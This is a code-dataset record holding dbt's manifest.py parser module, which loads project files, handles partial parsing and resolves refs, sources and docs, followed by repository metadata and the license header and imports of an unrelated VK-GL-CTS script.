] | 1 | 2021-09-09T20:22:43.000Z | 2021-09-09T20:22:43.000Z | core/dbt/parser/manifest.py | rfan-debug/dbt | 44e7390526c087ec73f2b1160e2783d44d2c34c0 | [
"Apache-2.0"
] | null | null | null | core/dbt/parser/manifest.py | rfan-debug/dbt | 44e7390526c087ec73f2b1160e2783d44d2c34c0 | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass
from dataclasses import field
import os
import traceback
from typing import (
Dict, Optional, Mapping, Callable, Any, List, Type, Union, Tuple
)
import time
import dbt.exceptions
import dbt.tracking
import dbt.flags as flags
from dbt.adapters.factory import (
get_adapter,
get_relation_class_by_name,
get_adapter_package_names,
)
from dbt.helper_types import PathSet
from dbt.logger import GLOBAL_LOGGER as logger, DbtProcessState
from dbt.node_types import NodeType
from dbt.clients.jinja import get_rendered, MacroStack
from dbt.clients.jinja_static import statically_extract_macro_calls
from dbt.clients.system import make_directory
from dbt.config import Project, RuntimeConfig
from dbt.context.docs import generate_runtime_docs
from dbt.context.macro_resolver import MacroResolver, TestMacroNamespace
from dbt.context.configured import generate_macro_context
from dbt.context.providers import ParseProvider
from dbt.contracts.files import FileHash, ParseFileType, SchemaSourceFile
from dbt.parser.read_files import read_files, load_source_file
from dbt.parser.partial import PartialParsing
from dbt.contracts.graph.compiled import ManifestNode
from dbt.contracts.graph.manifest import (
Manifest, Disabled, MacroManifest, ManifestStateCheck, ParsingInfo
)
from dbt.contracts.graph.parsed import (
ParsedSourceDefinition, ParsedNode, ParsedMacro, ColumnInfo, ParsedExposure
)
from dbt.contracts.util import Writable
from dbt.exceptions import (
ref_target_not_found,
get_target_not_found_or_disabled_msg,
source_target_not_found,
get_source_not_found_or_disabled_msg,
warn_or_error,
)
from dbt.parser.base import Parser
from dbt.parser.analysis import AnalysisParser
from dbt.parser.data_test import DataTestParser
from dbt.parser.docs import DocumentationParser
from dbt.parser.hooks import HookParser
from dbt.parser.macros import MacroParser
from dbt.parser.models import ModelParser
from dbt.parser.schemas import SchemaParser
from dbt.parser.search import FileBlock
from dbt.parser.seeds import SeedParser
from dbt.parser.snapshots import SnapshotParser
from dbt.parser.sources import SourcePatcher
from dbt.ui import warning_tag
from dbt.version import __version__
from dbt.dataclass_schema import StrEnum, dbtClassMixin
PARTIAL_PARSE_FILE_NAME = 'partial_parse.msgpack'
PARSING_STATE = DbtProcessState('parsing')
DEFAULT_PARTIAL_PARSE = False
class ReparseReason(StrEnum):
version_mismatch = '01_version_mismatch'
file_not_found = '02_file_not_found'
vars_changed = '03_vars_changed'
profile_changed = '04_profile_changed'
deps_changed = '05_deps_changed'
project_config_changed = '06_project_config_changed'
load_file_failure = '07_load_file_failure'
exception = '08_exception'
# Part of saved performance info
@dataclass
class ParserInfo(dbtClassMixin):
parser: str
elapsed: float
parsed_path_count: int = 0
# Part of saved performance info
@dataclass
class ProjectLoaderInfo(dbtClassMixin):
project_name: str
elapsed: float
parsers: List[ParserInfo] = field(default_factory=list)
parsed_path_count: int = 0
# Part of saved performance info
@dataclass
class ManifestLoaderInfo(dbtClassMixin, Writable):
path_count: int = 0
parsed_path_count: int = 0
static_analysis_path_count: int = 0
static_analysis_parsed_path_count: int = 0
is_partial_parse_enabled: Optional[bool] = None
is_static_analysis_enabled: Optional[bool] = None
read_files_elapsed: Optional[float] = None
load_macros_elapsed: Optional[float] = None
parse_project_elapsed: Optional[float] = None
patch_sources_elapsed: Optional[float] = None
process_manifest_elapsed: Optional[float] = None
load_all_elapsed: Optional[float] = None
projects: List[ProjectLoaderInfo] = field(default_factory=list)
_project_index: Dict[str, ProjectLoaderInfo] = field(default_factory=dict)
def __post_serialize__(self, dct):
del dct['_project_index']
return dct
# The ManifestLoader loads the manifest. The standard way to use the
# ManifestLoader is using the 'get_full_manifest' class method, but
# many tests use abbreviated processes.
class ManifestLoader:
def __init__(
self,
root_project: RuntimeConfig,
all_projects: Mapping[str, Project],
macro_hook: Optional[Callable[[Manifest], Any]] = None,
) -> None:
self.root_project: RuntimeConfig = root_project
self.all_projects: Mapping[str, Project] = all_projects
self.manifest: Manifest = Manifest()
self.manifest.metadata = root_project.get_metadata()
self.started_at = int(time.time())
# This is a MacroQueryStringSetter callable, which is called
# later after we set the MacroManifest in the adapter. It sets
# up the query headers.
self.macro_hook: Callable[[Manifest], Any]
if macro_hook is None:
self.macro_hook = lambda m: None
else:
self.macro_hook = macro_hook
self._perf_info = self.build_perf_info()
# State check determines whether the saved_manifest and the current
# manifest match well enough to do partial parsing
self.manifest.state_check = self.build_manifest_state_check()
# We need to know if we're actually partially parsing. It could
# have been enabled, but not happening because of some issue.
self.partially_parsing = False
# This is a saved manifest from a previous run that's used for partial parsing
self.saved_manifest: Optional[Manifest] = self.read_manifest_for_partial_parse()
# This is the method that builds a complete manifest. We sometimes
# use an abbreviated process in tests.
@classmethod
def get_full_manifest(
cls,
config: RuntimeConfig,
*,
reset: bool = False,
) -> Manifest:
adapter = get_adapter(config) # type: ignore
# reset is set in a TaskManager load_manifest call, since
# the config and adapter may be persistent.
if reset:
config.clear_dependencies()
adapter.clear_macro_manifest()
macro_hook = adapter.connections.set_query_header
with PARSING_STATE: # set up logbook.Processor for parsing
# Start performance counting
start_load_all = time.perf_counter()
projects = config.load_dependencies()
loader = ManifestLoader(config, projects, macro_hook)
manifest = loader.load()
_check_manifest(manifest, config)
manifest.build_flat_graph()
# This needs to happen after loading from a partial parse,
# so that the adapter has the query headers from the macro_hook.
loader.save_macros_to_adapter(adapter)
# Save performance info
loader._perf_info.load_all_elapsed = (
time.perf_counter() - start_load_all
)
loader.track_project_load()
return manifest
# This is where the main action happens
def load(self):
# Read files creates a dictionary of projects to a dictionary
# of parsers to lists of file strings. The file strings are
# used to get the SourceFiles from the manifest files.
start_read_files = time.perf_counter()
project_parser_files = {}
for project in self.all_projects.values():
read_files(project, self.manifest.files, project_parser_files)
self._perf_info.path_count = len(self.manifest.files)
self._perf_info.read_files_elapsed = (time.perf_counter() - start_read_files)
skip_parsing = False
if self.saved_manifest is not None:
partial_parsing = PartialParsing(self.saved_manifest, self.manifest.files)
skip_parsing = partial_parsing.skip_parsing()
if skip_parsing:
# nothing changed, so we don't need to generate project_parser_files
self.manifest = self.saved_manifest
else:
# create child_map and parent_map
self.saved_manifest.build_parent_and_child_maps()
# files are different, we need to create a new set of
# project_parser_files.
try:
project_parser_files = partial_parsing.get_parsing_files()
self.partially_parsing = True
self.manifest = self.saved_manifest
except Exception:
# pp_files should still be the full set and manifest is new manifest,
# since get_parsing_files failed
logger.info("Partial parsing enabled but an error occurred. "
"Switching to a full re-parse.")
# Get traceback info
tb_info = traceback.format_exc()
formatted_lines = tb_info.splitlines()
(_, line, method) = formatted_lines[-3].split(', ')
exc_info = {
"traceback": tb_info,
"exception": formatted_lines[-1],
"code": formatted_lines[-2],
"location": f"{line} {method}",
}
# get file info for local logs
parse_file_type = None
file_id = partial_parsing.processing_file
if file_id and file_id in self.manifest.files:
old_file = self.manifest.files[file_id]
parse_file_type = old_file.parse_file_type
logger.debug(f"Partial parsing exception processing file {file_id}")
file_dict = old_file.to_dict()
logger.debug(f"PP file: {file_dict}")
exc_info['parse_file_type'] = parse_file_type
logger.debug(f"PP exception info: {exc_info}")
# Send event
if dbt.tracking.active_user is not None:
exc_info['full_reparse_reason'] = ReparseReason.exception
dbt.tracking.track_partial_parser(exc_info)
if self.manifest._parsing_info is None:
self.manifest._parsing_info = ParsingInfo()
if skip_parsing:
logger.info("Partial parsing enabled, no changes found, skipping parsing")
else:
# Load Macros
# We need to parse the macros first, so they're resolvable when
# the other files are loaded
start_load_macros = time.perf_counter()
for project in self.all_projects.values():
if project.project_name not in project_parser_files:
continue
parser_files = project_parser_files[project.project_name]
if 'MacroParser' not in parser_files:
continue
parser = MacroParser(project, self.manifest)
for file_id in parser_files['MacroParser']:
block = FileBlock(self.manifest.files[file_id])
parser.parse_file(block)
# increment parsed path count for performance tracking
self._perf_info.parsed_path_count = self._perf_info.parsed_path_count + 1
# Look at changed macros and update the macro.depends_on.macros
self.macro_depends_on()
self._perf_info.load_macros_elapsed = (time.perf_counter() - start_load_macros)
# Now that the macros are parsed, parse the rest of the files.
# This is currently done on a per project basis.
start_parse_projects = time.perf_counter()
# Load the rest of the files except for schema yaml files
parser_types: List[Type[Parser]] = [
ModelParser, SnapshotParser, AnalysisParser, DataTestParser,
SeedParser, DocumentationParser, HookParser]
for project in self.all_projects.values():
if project.project_name not in project_parser_files:
continue
self.parse_project(
project,
project_parser_files[project.project_name],
parser_types
)
# Now that we've loaded most of the nodes (except for schema tests and sources)
# load up the Lookup objects to resolve them by name, so the SourceFiles store
# the unique_id instead of the name. Sources are loaded from yaml files, so
# aren't in place yet
self.manifest.rebuild_ref_lookup()
self.manifest.rebuild_doc_lookup()
# Load yaml files
parser_types = [SchemaParser]
for project in self.all_projects.values():
if project.project_name not in project_parser_files:
continue
self.parse_project(
project,
project_parser_files[project.project_name],
parser_types
)
self._perf_info.parse_project_elapsed = (time.perf_counter() - start_parse_projects)
# patch_sources converts the UnparsedSourceDefinitions in the
# Manifest.sources to ParsedSourceDefinition via 'patch_source'
# in SourcePatcher
start_patch = time.perf_counter()
patcher = SourcePatcher(self.root_project, self.manifest)
patcher.construct_sources()
self.manifest.sources = patcher.sources
self._perf_info.patch_sources_elapsed = (
time.perf_counter() - start_patch
)
# ParseResults had a 'disabled' attribute which was a dictionary
# which is now named '_disabled'. This used to copy from
# ParseResults to the Manifest.
# TODO: normalize to only one disabled
disabled = []
for value in self.manifest._disabled.values():
disabled.extend(value)
self.manifest.disabled = disabled
# copy the selectors from the root_project to the manifest
self.manifest.selectors = self.root_project.manifest_selectors
# update the refs, sources, and docs
# These check the created_at time on the nodes to
# determine whether they need processinga.
start_process = time.perf_counter()
self.process_sources(self.root_project.project_name)
self.process_refs(self.root_project.project_name)
self.process_docs(self.root_project)
# update tracking data
self._perf_info.process_manifest_elapsed = (
time.perf_counter() - start_process
)
self._perf_info.static_analysis_parsed_path_count = (
self.manifest._parsing_info.static_analysis_parsed_path_count
)
self._perf_info.static_analysis_path_count = (
self.manifest._parsing_info.static_analysis_path_count
)
# write out the fully parsed manifest
self.write_manifest_for_partial_parse()
return self.manifest
# Parse the files in the 'parser_files' dictionary, for parsers listed in
# 'parser_types'
def parse_project(
self,
project: Project,
parser_files,
parser_types: List[Type[Parser]],
) -> None:
project_loader_info = self._perf_info._project_index[project.project_name]
start_timer = time.perf_counter()
total_parsed_path_count = 0
# Loop through parsers with loaded files.
for parser_cls in parser_types:
parser_name = parser_cls.__name__
# No point in creating a parser if we don't have files for it
if parser_name not in parser_files or not parser_files[parser_name]:
continue
# Initialize timing info
project_parsed_path_count = 0
parser_start_timer = time.perf_counter()
# Parse the project files for this parser
parser: Parser = parser_cls(project, self.manifest, self.root_project)
for file_id in parser_files[parser_name]:
block = FileBlock(self.manifest.files[file_id])
if isinstance(parser, SchemaParser):
assert isinstance(block.file, SchemaSourceFile)
if self.partially_parsing:
dct = block.file.pp_dict
else:
dct = block.file.dict_from_yaml
parser.parse_file(block, dct=dct)
else:
parser.parse_file(block)
project_parsed_path_count = project_parsed_path_count + 1
# Save timing info
project_loader_info.parsers.append(ParserInfo(
parser=parser.resource_type,
parsed_path_count=project_parsed_path_count,
elapsed=time.perf_counter() - parser_start_timer
))
total_parsed_path_count = total_parsed_path_count + project_parsed_path_count
# HookParser doesn't run from loaded files, just dbt_project.yml,
# so do separately
# This shouldn't need to be parsed again if we're starting from
# a saved manifest, because that won't be allowed if dbt_project.yml
# changed, but leave for now.
if not self.partially_parsing and HookParser in parser_types:
hook_parser = HookParser(project, self.manifest, self.root_project)
path = hook_parser.get_path()
file = load_source_file(path, ParseFileType.Hook, project.project_name)
if file:
file_block = FileBlock(file)
hook_parser.parse_file(file_block)
# Store the performance info
elapsed = time.perf_counter() - start_timer
project_loader_info.parsed_path_count = (
project_loader_info.parsed_path_count + total_parsed_path_count
)
project_loader_info.elapsed = project_loader_info.elapsed + elapsed
self._perf_info.parsed_path_count = (
self._perf_info.parsed_path_count + total_parsed_path_count
)
# Loop through macros in the manifest and statically parse
# the 'macro_sql' to find depends_on.macros
def macro_depends_on(self):
internal_package_names = get_adapter_package_names(
self.root_project.credentials.type
)
macro_resolver = MacroResolver(
self.manifest.macros,
self.root_project.project_name,
internal_package_names
)
macro_ctx = generate_macro_context(self.root_project)
macro_namespace = TestMacroNamespace(
macro_resolver, {}, None, MacroStack(), []
)
adapter = get_adapter(self.root_project)
db_wrapper = ParseProvider().DatabaseWrapper(
adapter, macro_namespace
)
for macro in self.manifest.macros.values():
if macro.created_at < self.started_at:
continue
possible_macro_calls = statically_extract_macro_calls(
macro.macro_sql, macro_ctx, db_wrapper)
for macro_name in possible_macro_calls:
# adapter.dispatch calls can generate a call with the same name as the macro
# it ought to be an adapter prefix (postgres_) or default_
if macro_name == macro.name:
continue
package_name = macro.package_name
if '.' in macro_name:
package_name, macro_name = macro_name.split('.')
dep_macro_id = macro_resolver.get_macro_id(package_name, macro_name)
if dep_macro_id:
macro.depends_on.add_macro(dep_macro_id) # will check for dupes
def write_manifest_for_partial_parse(self):
path = os.path.join(self.root_project.target_path,
PARTIAL_PARSE_FILE_NAME)
try:
# This shouldn't be necessary, but we have gotten bug reports (#3757) of the
# saved manifest not matching the code version.
if self.manifest.metadata.dbt_version != __version__:
logger.debug("Manifest metadata did not contain correct version. "
f"Contained '{self.manifest.metadata.dbt_version}' instead.")
self.manifest.metadata.dbt_version = __version__
manifest_msgpack = self.manifest.to_msgpack()
make_directory(os.path.dirname(path))
with open(path, 'wb') as fp:
fp.write(manifest_msgpack)
except Exception:
raise
def is_partial_parsable(self, manifest: Manifest) -> Tuple[bool, Optional[str]]:
"""Compare the global hashes of the read-in parse results' values to
the known ones, and return if it is ok to re-use the results.
"""
valid = True
reparse_reason = None
if manifest.metadata.dbt_version != __version__:
# #3757 log both versions because of reports of invalid cases of mismatch.
logger.info("Unable to do partial parsing because of a dbt version mismatch. "
f"Saved manifest version: {manifest.metadata.dbt_version}. "
f"Current version: {__version__}.")
# If the version is wrong, the other checks might not work
return False, ReparseReason.version_mismatch
if self.manifest.state_check.vars_hash != manifest.state_check.vars_hash:
logger.info("Unable to do partial parsing because config vars, "
"config profile, or config target have changed")
valid = False
reparse_reason = ReparseReason.vars_changed
if self.manifest.state_check.profile_hash != manifest.state_check.profile_hash:
# Note: This should be made more granular. We shouldn't need to invalidate
# partial parsing if a non-used profile section has changed.
logger.info("Unable to do partial parsing because profile has changed")
valid = False
reparse_reason = ReparseReason.profile_changed
missing_keys = {
k for k in self.manifest.state_check.project_hashes
if k not in manifest.state_check.project_hashes
}
if missing_keys:
logger.info("Unable to do partial parsing because a project dependency has been added")
valid = False
reparse_reason = ReparseReason.deps_changed
for key, new_value in self.manifest.state_check.project_hashes.items():
if key in manifest.state_check.project_hashes:
old_value = manifest.state_check.project_hashes[key]
if new_value != old_value:
logger.info("Unable to do partial parsing because "
"a project config has changed")
valid = False
reparse_reason = ReparseReason.project_config_changed
return valid, reparse_reason
def _partial_parse_enabled(self):
# if the CLI is set, follow that
if flags.PARTIAL_PARSE is not None:
return flags.PARTIAL_PARSE
# if the config is set, follow that
elif self.root_project.config.partial_parse is not None:
return self.root_project.config.partial_parse
else:
return DEFAULT_PARTIAL_PARSE
def read_manifest_for_partial_parse(self) -> Optional[Manifest]:
if not self._partial_parse_enabled():
logger.debug('Partial parsing not enabled')
return None
path = os.path.join(self.root_project.target_path,
PARTIAL_PARSE_FILE_NAME)
reparse_reason = None
if os.path.exists(path):
try:
with open(path, 'rb') as fp:
manifest_mp = fp.read()
manifest: Manifest = Manifest.from_msgpack(manifest_mp) # type: ignore
# keep this check inside the try/except in case something about
# the file has changed in weird ways, perhaps due to being a
# different version of dbt
is_partial_parseable, reparse_reason = self.is_partial_parsable(manifest)
if is_partial_parseable:
return manifest
except Exception as exc:
logger.debug(
'Failed to load parsed file from disk at {}: {}'
.format(path, exc),
exc_info=True
)
reparse_reason = ReparseReason.load_file_failure
else:
logger.info(f"Unable to do partial parsing because {path} not found")
reparse_reason = ReparseReason.file_not_found
# this event is only fired if a full reparse is needed
dbt.tracking.track_partial_parser({'full_reparse_reason': reparse_reason})
return None
def build_perf_info(self):
mli = ManifestLoaderInfo(
is_partial_parse_enabled=self._partial_parse_enabled(),
is_static_analysis_enabled=flags.USE_EXPERIMENTAL_PARSER
)
for project in self.all_projects.values():
project_info = ProjectLoaderInfo(
project_name=project.project_name,
elapsed=0,
)
mli.projects.append(project_info)
mli._project_index[project.project_name] = project_info
return mli
# TODO: this should be calculated per-file based on the vars() calls made in
# parsing, so changing one var doesn't invalidate everything. also there should
# be something like that for env_var - currently changing env_vars in way that
# impact graph selection or configs will result in weird test failures.
# finally, we should hash the actual profile used, not just root project +
# profiles.yml + relevant args. While sufficient, it is definitely overkill.
def build_manifest_state_check(self):
config = self.root_project
all_projects = self.all_projects
# if any of these change, we need to reject the parser
vars_hash = FileHash.from_contents(
'\x00'.join([
getattr(config.args, 'vars', '{}') or '{}',
getattr(config.args, 'profile', '') or '',
getattr(config.args, 'target', '') or '',
__version__
])
)
profile_path = os.path.join(config.args.profiles_dir, 'profiles.yml')
with open(profile_path) as fp:
profile_hash = FileHash.from_contents(fp.read())
project_hashes = {}
for name, project in all_projects.items():
path = os.path.join(project.project_root, 'dbt_project.yml')
with open(path) as fp:
project_hashes[name] = FileHash.from_contents(fp.read())
state_check = ManifestStateCheck(
vars_hash=vars_hash,
profile_hash=profile_hash,
project_hashes=project_hashes,
)
return state_check
def save_macros_to_adapter(self, adapter):
macro_manifest = MacroManifest(self.manifest.macros)
adapter._macro_manifest_lazy = macro_manifest
# This executes the callable macro_hook and sets the
# query headers
self.macro_hook(macro_manifest)
# This creates a MacroManifest which contains the macros in
# the adapter. Only called by the load_macros call from the
# adapter.
def create_macro_manifest(self):
for project in self.all_projects.values():
# what is the manifest passed in actually used for?
macro_parser = MacroParser(project, self.manifest)
for path in macro_parser.get_paths():
source_file = load_source_file(
path, ParseFileType.Macro, project.project_name)
block = FileBlock(source_file)
# This does not add the file to the manifest.files,
# but that shouldn't be necessary here.
macro_parser.parse_file(block)
macro_manifest = MacroManifest(self.manifest.macros)
return macro_manifest
# This is called by the adapter code only, to create the
# MacroManifest that's stored in the adapter.
# 'get_full_manifest' uses a persistent ManifestLoader while this
# creates a temporary ManifestLoader and throws it away.
# Not sure when this would actually get used except in tests.
# The ManifestLoader loads macros with other files, then copies
# into the adapter MacroManifest.
@classmethod
def load_macros(
cls,
root_config: RuntimeConfig,
macro_hook: Callable[[Manifest], Any],
) -> Manifest:
with PARSING_STATE:
projects = root_config.load_dependencies()
# This creates a loader object, including result,
# and then throws it away, returning only the
# manifest
loader = cls(root_config, projects, macro_hook)
macro_manifest = loader.create_macro_manifest()
return macro_manifest
# Create tracking event for saving performance info
def track_project_load(self):
invocation_id = dbt.tracking.active_user.invocation_id
dbt.tracking.track_project_load({
"invocation_id": invocation_id,
"project_id": self.root_project.hashed_name(),
"path_count": self._perf_info.path_count,
"parsed_path_count": self._perf_info.parsed_path_count,
"read_files_elapsed": self._perf_info.read_files_elapsed,
"load_macros_elapsed": self._perf_info.load_macros_elapsed,
"parse_project_elapsed": self._perf_info.parse_project_elapsed,
"patch_sources_elapsed": self._perf_info.patch_sources_elapsed,
"process_manifest_elapsed": (
self._perf_info.process_manifest_elapsed
),
"load_all_elapsed": self._perf_info.load_all_elapsed,
"is_partial_parse_enabled": (
self._perf_info.is_partial_parse_enabled
),
"is_static_analysis_enabled": self._perf_info.is_static_analysis_enabled,
"static_analysis_path_count": self._perf_info.static_analysis_path_count,
"static_analysis_parsed_path_count": self._perf_info.static_analysis_parsed_path_count,
})
# Takes references in 'refs' array of nodes and exposures, finds the target
# node, and updates 'depends_on.nodes' with the unique id
def process_refs(self, current_project: str):
for node in self.manifest.nodes.values():
if node.created_at < self.started_at:
continue
_process_refs_for_node(self.manifest, current_project, node)
for exposure in self.manifest.exposures.values():
if exposure.created_at < self.started_at:
continue
_process_refs_for_exposure(self.manifest, current_project, exposure)
# nodes: node and column descriptions
# sources: source and table descriptions, column descriptions
# macros: macro argument descriptions
# exposures: exposure descriptions
def process_docs(self, config: RuntimeConfig):
for node in self.manifest.nodes.values():
if node.created_at < self.started_at:
continue
ctx = generate_runtime_docs(
config,
node,
self.manifest,
config.project_name,
)
_process_docs_for_node(ctx, node)
for source in self.manifest.sources.values():
if source.created_at < self.started_at:
continue
ctx = generate_runtime_docs(
config,
source,
self.manifest,
config.project_name,
)
_process_docs_for_source(ctx, source)
for macro in self.manifest.macros.values():
if macro.created_at < self.started_at:
continue
ctx = generate_runtime_docs(
config,
macro,
self.manifest,
config.project_name,
)
_process_docs_for_macro(ctx, macro)
for exposure in self.manifest.exposures.values():
if exposure.created_at < self.started_at:
continue
ctx = generate_runtime_docs(
config,
exposure,
self.manifest,
config.project_name,
)
_process_docs_for_exposure(ctx, exposure)
# Loops through all nodes and exposures, for each element in
# 'sources' array finds the source node and updates the
# 'depends_on.nodes' array with the unique id
def process_sources(self, current_project: str):
for node in self.manifest.nodes.values():
if node.resource_type == NodeType.Source:
continue
assert not isinstance(node, ParsedSourceDefinition)
if node.created_at < self.started_at:
continue
_process_sources_for_node(self.manifest, current_project, node)
for exposure in self.manifest.exposures.values():
if exposure.created_at < self.started_at:
continue
_process_sources_for_exposure(self.manifest, current_project, exposure)
def invalid_ref_fail_unless_test(node, target_model_name,
target_model_package, disabled):
if node.resource_type == NodeType.Test:
msg = get_target_not_found_or_disabled_msg(
node, target_model_name, target_model_package, disabled
)
if disabled:
logger.debug(warning_tag(msg))
else:
warn_or_error(
msg,
log_fmt=warning_tag('{}')
)
else:
ref_target_not_found(
node,
target_model_name,
target_model_package,
disabled=disabled,
)
def invalid_source_fail_unless_test(
node, target_name, target_table_name, disabled
):
if node.resource_type == NodeType.Test:
msg = get_source_not_found_or_disabled_msg(
node, target_name, target_table_name, disabled
)
if disabled:
logger.debug(warning_tag(msg))
else:
warn_or_error(
msg,
log_fmt=warning_tag('{}')
)
else:
source_target_not_found(
node,
target_name,
target_table_name,
disabled=disabled
)
def _check_resource_uniqueness(
manifest: Manifest,
config: RuntimeConfig,
) -> None:
names_resources: Dict[str, ManifestNode] = {}
alias_resources: Dict[str, ManifestNode] = {}
for resource, node in manifest.nodes.items():
if not node.is_relational:
continue
# appease mypy - sources aren't refable!
assert not isinstance(node, ParsedSourceDefinition)
name = node.name
# the full node name is really defined by the adapter's relation
relation_cls = get_relation_class_by_name(config.credentials.type)
relation = relation_cls.create_from(config=config, node=node)
full_node_name = str(relation)
existing_node = names_resources.get(name)
if existing_node is not None:
dbt.exceptions.raise_duplicate_resource_name(
existing_node, node
)
existing_alias = alias_resources.get(full_node_name)
if existing_alias is not None:
dbt.exceptions.raise_ambiguous_alias(
existing_alias, node, full_node_name
)
names_resources[name] = node
alias_resources[full_node_name] = node
def _warn_for_unused_resource_config_paths(
manifest: Manifest, config: RuntimeConfig
) -> None:
resource_fqns: Mapping[str, PathSet] = manifest.get_resource_fqns()
disabled_fqns: PathSet = frozenset(tuple(n.fqn) for n in manifest.disabled)
config.warn_for_unused_resource_config_paths(resource_fqns, disabled_fqns)
def _check_manifest(manifest: Manifest, config: RuntimeConfig) -> None:
_check_resource_uniqueness(manifest, config)
_warn_for_unused_resource_config_paths(manifest, config)
# This is just used in test cases
def _load_projects(config, paths):
for path in paths:
try:
project = config.new_project(path)
except dbt.exceptions.DbtProjectError as e:
raise dbt.exceptions.DbtProjectError(
'Failed to read package at {}: {}'
.format(path, e)
)
else:
yield project.project_name, project
def _get_node_column(node, column_name):
"""Given a ParsedNode, add some fields that might be missing. Return a
reference to the dict that refers to the given column, creating it if
it doesn't yet exist.
"""
if column_name in node.columns:
column = node.columns[column_name]
else:
node.columns[column_name] = ColumnInfo(name=column_name)
node.columns[column_name] = column
return column
DocsContextCallback = Callable[
[Union[ParsedNode, ParsedSourceDefinition]],
Dict[str, Any]
]
# node and column descriptions
def _process_docs_for_node(
context: Dict[str, Any],
node: ManifestNode,
):
node.description = get_rendered(node.description, context)
for column_name, column in node.columns.items():
column.description = get_rendered(column.description, context)
# source and table descriptions, column descriptions
def _process_docs_for_source(
context: Dict[str, Any],
source: ParsedSourceDefinition,
):
table_description = source.description
source_description = source.source_description
table_description = get_rendered(table_description, context)
source_description = get_rendered(source_description, context)
source.description = table_description
source.source_description = source_description
for column in source.columns.values():
column_desc = column.description
column_desc = get_rendered(column_desc, context)
column.description = column_desc
# macro argument descriptions
def _process_docs_for_macro(
context: Dict[str, Any], macro: ParsedMacro
) -> None:
macro.description = get_rendered(macro.description, context)
for arg in macro.arguments:
arg.description = get_rendered(arg.description, context)
# exposure descriptions
def _process_docs_for_exposure(
context: Dict[str, Any], exposure: ParsedExposure
) -> None:
exposure.description = get_rendered(exposure.description, context)
def _process_refs_for_exposure(
manifest: Manifest, current_project: str, exposure: ParsedExposure
):
"""Given a manifest and a exposure in that manifest, process its refs"""
for ref in exposure.refs:
target_model: Optional[Union[Disabled, ManifestNode]] = None
target_model_name: str
target_model_package: Optional[str] = None
if len(ref) == 1:
target_model_name = ref[0]
elif len(ref) == 2:
target_model_package, target_model_name = ref
else:
raise dbt.exceptions.InternalException(
f'Refs should always be 1 or 2 arguments - got {len(ref)}'
)
target_model = manifest.resolve_ref(
target_model_name,
target_model_package,
current_project,
exposure.package_name,
)
if target_model is None or isinstance(target_model, Disabled):
# This may raise. Even if it doesn't, we don't want to add
# this exposure to the graph b/c there is no destination exposure
invalid_ref_fail_unless_test(
exposure, target_model_name, target_model_package,
disabled=(isinstance(target_model, Disabled))
)
continue
target_model_id = target_model.unique_id
exposure.depends_on.nodes.append(target_model_id)
manifest.update_exposure(exposure)
def _process_refs_for_node(
manifest: Manifest, current_project: str, node: ManifestNode
):
"""Given a manifest and a node in that manifest, process its refs"""
for ref in node.refs:
target_model: Optional[Union[Disabled, ManifestNode]] = None
target_model_name: str
target_model_package: Optional[str] = None
if len(ref) == 1:
target_model_name = ref[0]
elif len(ref) == 2:
target_model_package, target_model_name = ref
else:
raise dbt.exceptions.InternalException(
f'Refs should always be 1 or 2 arguments - got {len(ref)}'
)
target_model = manifest.resolve_ref(
target_model_name,
target_model_package,
current_project,
node.package_name,
)
if target_model is None or isinstance(target_model, Disabled):
# This may raise. Even if it doesn't, we don't want to add
# this node to the graph b/c there is no destination node
node.config.enabled = False
invalid_ref_fail_unless_test(
node, target_model_name, target_model_package,
disabled=(isinstance(target_model, Disabled))
)
continue
target_model_id = target_model.unique_id
node.depends_on.nodes.append(target_model_id)
# TODO: I think this is extraneous, node should already be the same
# as manifest.nodes[node.unique_id] (we're mutating node here, not
# making a new one)
# Q: could we stop doing this?
manifest.update_node(node)
def _process_sources_for_exposure(
manifest: Manifest, current_project: str, exposure: ParsedExposure
):
target_source: Optional[Union[Disabled, ParsedSourceDefinition]] = None
for source_name, table_name in exposure.sources:
target_source = manifest.resolve_source(
source_name,
table_name,
current_project,
exposure.package_name,
)
if target_source is None or isinstance(target_source, Disabled):
invalid_source_fail_unless_test(
exposure,
source_name,
table_name,
disabled=(isinstance(target_source, Disabled))
)
continue
target_source_id = target_source.unique_id
exposure.depends_on.nodes.append(target_source_id)
manifest.update_exposure(exposure)
def _process_sources_for_node(
manifest: Manifest, current_project: str, node: ManifestNode
):
target_source: Optional[Union[Disabled, ParsedSourceDefinition]] = None
for source_name, table_name in node.sources:
target_source = manifest.resolve_source(
source_name,
table_name,
current_project,
node.package_name,
)
if target_source is None or isinstance(target_source, Disabled):
# this folows the same pattern as refs
node.config.enabled = False
invalid_source_fail_unless_test(
node,
source_name,
table_name,
disabled=(isinstance(target_source, Disabled))
)
continue
target_source_id = target_source.unique_id
node.depends_on.nodes.append(target_source_id)
manifest.update_node(node)
# This is called in task.rpc.sql_commands when a "dynamic" node is
# created in the manifest, in 'add_refs'
def process_macro(
config: RuntimeConfig, manifest: Manifest, macro: ParsedMacro
) -> None:
ctx = generate_runtime_docs(
config,
macro,
manifest,
config.project_name,
)
_process_docs_for_macro(ctx, macro)
# This is called in task.rpc.sql_commands when a "dynamic" node is
# created in the manifest, in 'add_refs'
def process_node(
config: RuntimeConfig, manifest: Manifest, node: ManifestNode
):
_process_sources_for_node(
manifest, config.project_name, node
)
_process_refs_for_node(manifest, config.project_name, node)
ctx = generate_runtime_docs(config, node, manifest, config.project_name)
_process_docs_for_node(ctx, node)
| 40.2453 | 99 | 0.641411 |
09d0b237ce880a87f966e823c7b5547ac8dcffa2 | 7,850 | py | Python | scripts/opengl/src_util.py | ShabbyX/VK-GL-CTS | 74ffed6e0b286e6279ed3db1a6c50aad6b387836 | [
"Apache-2.0"
] | null | null | null | scripts/opengl/src_util.py | ShabbyX/VK-GL-CTS | 74ffed6e0b286e6279ed3db1a6c50aad6b387836 | [
"Apache-2.0"
] | null | null | null | scripts/opengl/src_util.py | ShabbyX/VK-GL-CTS | 74ffed6e0b286e6279ed3db1a6c50aad6b387836 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# drawElements Quality Program utilities
# --------------------------------------
#
# Copyright 2015-2017 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
import os
import re
import sys
